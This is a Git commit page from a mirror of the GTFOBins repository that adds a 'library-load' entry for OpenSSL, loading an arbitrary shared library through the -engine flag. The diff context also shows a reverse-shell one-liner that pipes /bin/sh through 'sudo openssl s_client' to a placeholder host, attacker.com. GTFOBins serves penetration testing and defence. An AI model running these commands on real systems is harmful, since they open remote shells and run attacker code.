1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 00:06:03 +02:00

Add library load section to OpenSSL

This commit is contained in:
d0zer 2020-04-12 21:20:11 +12:00 committed by GitHub
parent 3310197fbc
commit 041110d54d
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -79,4 +79,6 @@ functions:
RHOST=attacker.com
RPORT=12345
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s
library-load:
- code: openssl req -engine ./lib.so
---